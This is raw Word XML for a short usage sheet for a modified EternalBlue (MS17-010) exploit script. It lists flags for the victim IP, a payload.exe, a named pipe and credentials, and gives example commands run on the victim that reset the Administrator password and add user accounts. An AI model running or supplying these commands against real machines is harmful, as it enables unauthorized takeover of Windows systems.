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39E9" w14:textId="77777777" w:rsidR="00FC5AB4" w:rsidRDefault="00E66508" w:rsidP="00E66508">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t>Eternalblue exploit docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850870C" w14:textId="77777777" w:rsidR="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E66508">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The exploit is made with a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> lot of inspiration taken from </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00794E8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://github.com/worawit/MS17-010</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> the changes were made to the zzz_exploit, which requires access to a named pipe, but is a lot less likely to crash than the original eternalblue exploits. The changes were made to the main code of the exploit, as well as the smb_pwn method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459A450" w14:textId="77777777" w:rsidR="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Several inputs can be given, these are listed below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabelraster"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="page" w:horzAnchor="page" w:tblpX="520" w:tblpY="3953"/>
        <w:tblW w:w="10343" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1154"/>
        <w:gridCol w:w="1393"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E66508" w14:paraId="2D68FBDD" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="554"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E015971" w14:textId="77777777" w:rsidR="00E66508" w:rsidRPr="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea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Command line Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D12FB9" w14:textId="77777777" w:rsidR="00E66508" w:rsidRPr="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea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--Tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2820A6CC" w14:textId="77777777" w:rsidR="00E66508" w:rsidRPr="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea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134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07ABAABE" w14:textId="77777777" w:rsidR="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea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required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FC1EB33" w14:textId="77777777" w:rsidR="00E66508" w:rsidRPr="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea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Example usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="66C0854A" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="537"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F931C30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-ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39AD1B2E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--ip_addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F880F6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Ip address of the victim machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187841A0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536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="587A4BF3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-ip 10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="47C085F3" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="554"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C643D3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-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B24A443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--commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BE5112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Cmd commands to be executed by the victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B38E8E2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536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="514B1063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-c </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66508">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">"net user Administrator admin" "net user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>bastri bastri /ADD</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66508">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="6CAF43F5" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="554"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FDF88E7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-payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D93E6A6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--payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E045B40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Payload file to be executed by the machine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>, should always be named payload.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782D8448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536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0538BCCA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-payload /home/bastri/Payloads/payload.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="0F782E9E" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACEFF26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-pipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="121F1313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--pipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2B7134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Named pipe to use when attacking the victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16A2C5AA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536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D85C234" w14:textId="4D7619F0" w:rsidR="00E66508" w:rsidRDefault="00F47D62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-pipe Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="78425C28" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A12244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-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AC4D64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--username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D21C221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Username to use when accessing named pipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53214CCB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536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8BFBA9" w14:textId="469E04A5" w:rsidR="00E66508" w:rsidRDefault="00F47D62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-user bastri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E66508" w14:paraId="1BF6E152" w14:textId="77777777" w:rsidTr="00F47D62">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24D65B9A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-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E84DA2B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--password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B27870" w14:textId="77777777" w:rsidR="00E66508" w:rsidRDefault="00E66508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Password to use when accessing named pipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC35235" w14:textId="43CECE94" w:rsidR="00E66508" w:rsidRDefault="00D5264C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N</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidR="00E66508">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163575DA" w14:textId="13A1E310" w:rsidR="00E66508" w:rsidRDefault="00F47D62" w:rsidP="00E66508">
            <w:pPr>
              <w:pStyle w:val="Lijstalinea"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>-pass bastri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="692ED84F" w14:textId="0E7E46A1" w:rsidR="00E66508" w:rsidRDefault="00E66508" w:rsidP="00E66508">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D684A5C" w14:textId="40B79422" w:rsidR="00146025" w:rsidRPr="00146025" w:rsidRDefault="00146025" w:rsidP="00146025">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBAC3AD" w14:textId="60F1B031" w:rsidR="00146025" w:rsidRPr="00146025" w:rsidRDefault="00146025" w:rsidP="00146025">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539BFD49" w14:textId="06F35F56" w:rsidR="00146025" w:rsidRPr="00146025" w:rsidRDefault="00E771CE" w:rsidP="00146025">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Full command example: python zzz_exploit.py -ip 10.10.10.40 -payload payload.exe -c </w:t>
      </w:r>
      <w:r w:rsidRPr="00E771CE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"net user Administrator admin" "net user haris haris"</w:t>
      </w:r>
      <w:r w:rsidR="00B456F6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -pipe Users </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00146025" w:rsidRPr="00146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26D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2C2B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08"/>
    <w:rsid w:val="00146025"/>
    <w:rsid w:val="00B456F6"/>
    <w:rsid w:val="00D5264C"/>
    <w:rsid w:val="00E66508"/>
    <w:rsid w:val="00E771CE"/>
    <w:rsid w:val="00F47D62"/>
    <w:rsid w:val="00F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86BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D25FDB06-3440-4B64-8985-09E8D709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6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6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E6650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6650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E66508"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabelraster">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Standaardtabel"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E6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rawit/MS17-01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C575231B1864A83627114F7CA707A" ma:contentTypeVersion="4" ma:contentTypeDescription="Een nieuw document maken." ma:contentTypeScope="" ma:versionID="6f4847f7776433fe0a3799d5e3e764ac">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="f4055c7b-44df-4bb5-9ca6-de2d20748cef" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a1ada2f5e98124b61fffc4c340360ac6" ns3:_="">
    <xsd:import namespace="f4055c7b-44df-4bb5-9ca6-de2d20748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55c7b-44df-4bb5-9ca6-de2d20748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8CDEA0-FEB5-4A63-98AC-1F5E20BB9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55c7b-44df-4bb5-9ca6-de2d20748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4D8CE3-42F7-44FD-8D91-A7C1F961E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6B8FF-7C69-4FEE-B31A-F4A39C00E5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appeldoorn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bastiaan appeldoorn</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-19T13:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-19T13:37:00Z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0x0101005CBC575231B1864A83627114F7CA707A</vt:lpwstr>
  </property>
</Properties>
</file>